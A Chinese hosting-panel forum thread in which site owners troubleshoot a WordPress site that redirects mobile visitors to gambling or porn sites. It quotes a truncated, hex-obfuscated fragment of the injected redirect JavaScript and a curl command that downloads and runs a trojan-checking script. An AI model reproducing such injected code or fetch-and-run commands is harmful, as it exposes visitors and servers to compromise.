【已解答】网站被恶意跳转,如何处理?

各位老大求助啊!


网站PC端访问正常 只有在移动访问首页 会跳转到BC或者H网 而且只跳转一次 第二次访问正常...
最开始以为是网站有木马,扫描也没有扫描到!
最后没办法,只有更换服务器,从新安装宝塔环境,wordpress最新版+主题 导入数据库之后依旧出现跳转.
搞了好几天真的是一点办法没有了

执行了这段代码之后 显示未检测到木马文件

• curl -sSO -k https://download.bt.cn/tools/w_check.py && btpython w_check.py && rm -rf w_check.py
  

各位大佬有遇到这个问题的嘛! 所有网站程序文件都是新的,只有是域名的问题了....有知道这个问题咋处理嘛?

感觉自己的问题跟下面这个贴子很像,是不是ssl证书的问题?

【待反馈】请问大家的恶意【跳转】是怎么解决的 - Linux面板 - 宝塔面板论坛 (bt.cn)

啥主题？（不建议使用开心班主题）
是不是你的主题有后门呀？
我网站用的官方主题没问题

桔子软件 发表于 2023-1-11 13:13
啥主题？（不建议使用开心班主题）
是不是你的主题有后门呀？
我网站用的官方主题没问题 ...

主题7b2的 花钱买的正版主题

感觉还是文件出了问题，毕竟都换过服务器了

那不可能呀？？？我是子比主题正版，都是很好的主题，没有后门呀
清理浏览器缓存试一试，换个ssl证书

您好，建议您
1.结合网站日志进行溯源，清理被篡改的文件。再使用防篡改插件进行防护网站目录
2.排查下是否为DNS劫持
3.联系安全专业机构进行一个检查修复
解决后如果网站使用的是http的话建议您部署个证书

堡塔运维向樛木 发表于 2023-1-11 16:06
您好，建议您
1.结合网站日志进行溯源，清理被篡改的文件。再使用防篡改插件进行防护网站目录
2.排查下是否 ...

最*不少网站都出现了这种
var _0xafac=["\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x73\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x77\x61\x66\x5F\x73\x63","\x35\x38\x

请问怎么解决

宝塔用户_pwsxho 发表于 2023-1-25 23:24
最*不少网站都出现了这种
var _0xafac=["\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x73\x65\x74\x4D ...

参考下面帖子内所提供的脚本进行处理
https://www.bt.cn/bbs/thread-105121-1-1.html

宝塔面板7.9.82 中招，一直在跳，重装 nginx 1.22 过一会样跳

您好，您可以根据我上面发的帖子，您扫描下。如未匹配到，建议您排查下整体网站程序源码

谢花郎 发表于 2023-3-2 17:43
您好，您可以根据我上面发的帖子，您扫描下。如未匹配到，建议您排查下整体网站程序源码 ...

把网站程序删除了还在继续跳

那这个建议您排查下是不是被网络劫持导致的，如网站程序都没有了，还能跳。
那这个就有点怀疑是网络劫持了

谢花郎 发表于 2023-3-4 21:32
那这个建议您排查下是不是被网络劫持导致的，如网站程序都没有了，还能跳。
那这个就有点怀疑是网络劫持了 ...

我吧网址关闭操作，就没有跳转了

您好，建议您可以排查下是否被劫持了